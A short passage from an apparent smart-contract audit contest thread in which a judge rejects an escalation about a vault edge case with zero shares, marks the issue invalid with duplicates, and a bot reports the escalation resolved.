Because it depends on YV how they handle this situation with large liquidations and its logic has to allow for the situation when the PV vault holds 0 shares, while still there are deposits. Hence, I believe it depends on YV. The decision remains the same, planning to reject the escalation and leave the issue as it is.

WangSecurity commented 2 months ago

Result: Invalid Has duplicates

sherlock-admin2 commented 2 months ago

Escalations have been resolved successfully!

Escalation status: